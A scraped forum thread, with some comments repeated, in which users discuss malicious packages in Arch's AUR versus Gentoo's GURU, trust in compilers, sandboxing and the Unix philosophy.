As far as I can tell this only affects AUR(which you have to go out of your way to access and you are encouraged to review all the build scripts, although in practice I suspect many people are complacent or not knowledgeable enough), not the official repos. I am guessing the official repos for gentoo and arch have similar security, but if you go and get unnoficial/user ebuilds for gentoo you likely run into many of the same situations (although I don’t really know much about the gentoo ecosystem).
It is also worth pointing out Arch probably has a much larger target on its back since it is much more popular and there are many distro’s based off of it(which tends to attract the less knowledgeable users, who are primed targets for just randomly getting AUR without thinking)
Edit: For gentoo, it looks like GURU is more secure and has trusted users who review, but in practice I don’t know how well they do review or if they have had problems of people trying to submit malicious scripts. Also, it looks like GURU is considered more “official” than AUR so they are not really direct comparisons but I suspect they play similar roles in the community.
I’m not super familiar with Portage but is it inherently safer than other linux package managers? How sure are you that all the code you’re compiling was not written by Mossad?
Computing requires trust. Computers are too large and complex to understand, ultimately you have to have a source or trust somewhere that you rely on to make you not owned and spend your own attention on other attack surfaces.
Computing is inherently insecure and risky, you must have a risk model and implement appropriate mitigations such as offline backups, non email 2fa, sandboxing and so on as appropriate to your situation.
I wish it were not so but it’s not even a capitalism thing, people have been fucking people’s shit up out of curiosity, greed, anger, or accident since forever.
I agree but I think there are a lot of ways to make computers safers. Enabling sandboxing by default, coming up with a more robust permissions system allowing programs to only access specific parts of the hardware and of the file system (Android already has this). But most importantly - making software that is small, simple and understandable to humans
The linux security model is outdated yes, nothing to do with package managers. I recommend using SElinux for finer management.
Software is how it is because people don’t want software that follows the unix philosophy. They want bloated pieces of crap that do everything, they don’t want to compose multiple tools or not have stuff try to guess what you mean to do. They want autoconfiguration and highly customised PCs.
You can set up your own system to be a lovely island of sanity and never install a browser or officer suite (I have walked this path and it’s very relaxing) but 99.999999999% of people are vehmently against this and also completely disinterested in their system. So here we are.
That is not the unix philosophy lol that is a detail of the kernal
In 1978, Doug McIlroy documented a set of principles encapsulating the “characteristic style” that had emerged among Unix system users and developers
Make each program do one thing well. To do a new job, build afresh rather than complicate old programs by adding new “features”.
Expect the output of every program to become the input to another, as yet unknown, program. Don’t clutter output with extraneous information. Avoid stringently columnar or binary input formats. Don’t insist on interactive input.
Design and build software, even operating systems, to be tried early, ideally within weeks. Don’t hesitate to throw away the clumsy parts and rebuild them.
Use tools in preference to unskilled help to lighten a programming task, even if you have to detour to build the tools and expect to throw some of them out after you’ve finished using them.
Expect the output of every program to become the input to another, as yet unknown, program. Don’t clutter output with extraneous information. Avoid stringently columnar or binary input formats. Don’t insist on interactive input.
Not every file format has the complexity of JSON. And most of the files the kernel serves are either trivial enough to be parsed with a simple FSM or not meant to be parsed at all. No dev worth their weight in sawdust is gonna pull an external library just to help parse the space-separated numbers of /proc/uptime.
How sure are you that all the code you’re compiling was not written by Mossad?
Code is inherently untrustworthy. Even if you read every line of source code, can you be ceirtain that the compiler didnt inject some malware into the program? (or if you compiled the compiler, how can you be ceirtain that the bootstrapping compiler didnt embed any malicious code into that one?)
Maybe this is the push I need to try out Gentoo
As far as I can tell this only affects AUR(which you have to go out of your way to access and you are encouraged to review all the build scripts, although in practice I suspect many people are complacent or not knowledgeable enough), not the official repos. I am guessing the official repos for gentoo and arch have similar security, but if you go and get unnoficial/user ebuilds for gentoo you likely run into many of the same situations (although I don’t really know much about the gentoo ecosystem).
It is also worth pointing out Arch probably has a much larger target on its back since it is much more popular and there are many distro’s based off of it(which tends to attract the less knowledgeable users, who are primed targets for just randomly getting AUR without thinking)
Edit: For gentoo, it looks like GURU is more secure and has trusted users who review, but in practice I don’t know how well they do review or if they have had problems of people trying to submit malicious scripts. Also, it looks like GURU is considered more “official” than AUR so they are not really direct comparisons but I suspect they play similar roles in the community.
I’m not super familiar with Portage but is it inherently safer than other linux package managers? How sure are you that all the code you’re compiling was not written by Mossad?
Computing requires trust. Computers are too large and complex to understand, ultimately you have to have a source or trust somewhere that you rely on to make you not owned and spend your own attention on other attack surfaces.
Computing is inherently insecure and risky, you must have a risk model and implement appropriate mitigations such as offline backups, non email 2fa, sandboxing and so on as appropriate to your situation.
I wish it were not so but it’s not even a capitalism thing, people have been fucking people’s shit up out of curiosity, greed, anger, or accident since forever.
I agree but I think there are a lot of ways to make computers safers. Enabling sandboxing by default, coming up with a more robust permissions system allowing programs to only access specific parts of the hardware and of the file system (Android already has this). But most importantly - making software that is small, simple and understandable to humans
The linux security model is outdated yes, nothing to do with package managers. I recommend using SElinux for finer management.
Software is how it is because people don’t want software that follows the unix philosophy. They want bloated pieces of crap that do everything, they don’t want to compose multiple tools or not have stuff try to guess what you mean to do. They want autoconfiguration and highly customised PCs.
You can set up your own system to be a lovely island of sanity and never install a browser or officer suite (I have walked this path and it’s very relaxing) but 99.999999999% of people are vehmently against this and also completely disinterested in their system. So here we are.
Everything is a file means that every program needs a parser. Means that every program will at least depend on some parsing library.
That is not the unix philosophy lol that is a detail of the kernal
In 1978, Doug McIlroy documented a set of principles encapsulating the “characteristic style” that had emerged among Unix system users and developers
Make each program do one thing well. To do a new job, build afresh rather than complicate old programs by adding new “features”.
Expect the output of every program to become the input to another, as yet unknown, program. Don’t clutter output with extraneous information. Avoid stringently columnar or binary input formats. Don’t insist on interactive input.
Design and build software, even operating systems, to be tried early, ideally within weeks. Don’t hesitate to throw away the clumsy parts and rebuild them.
Use tools in preference to unskilled help to lighten a programming task, even if you have to detour to build the tools and expect to throw some of them out after you’ve finished using them.
https://en.wikipedia.org/wiki/Unix_philosophy
Parsers
Okay? not at all relevant to anything I’ve said?
Not every file format has the complexity of JSON. And most of the files the kernel serves are either trivial enough to be parsed with a simple FSM or not meant to be parsed at all. No dev worth their weight in sawdust is gonna pull an external library just to help parse the space-separated numbers of /proc/uptime.
Code is inherently untrustworthy. Even if you read every line of source code, can you be ceirtain that the compiler didnt inject some malware into the program? (or if you compiled the compiler, how can you be ceirtain that the bootstrapping compiler didnt embed any malicious code into that one?)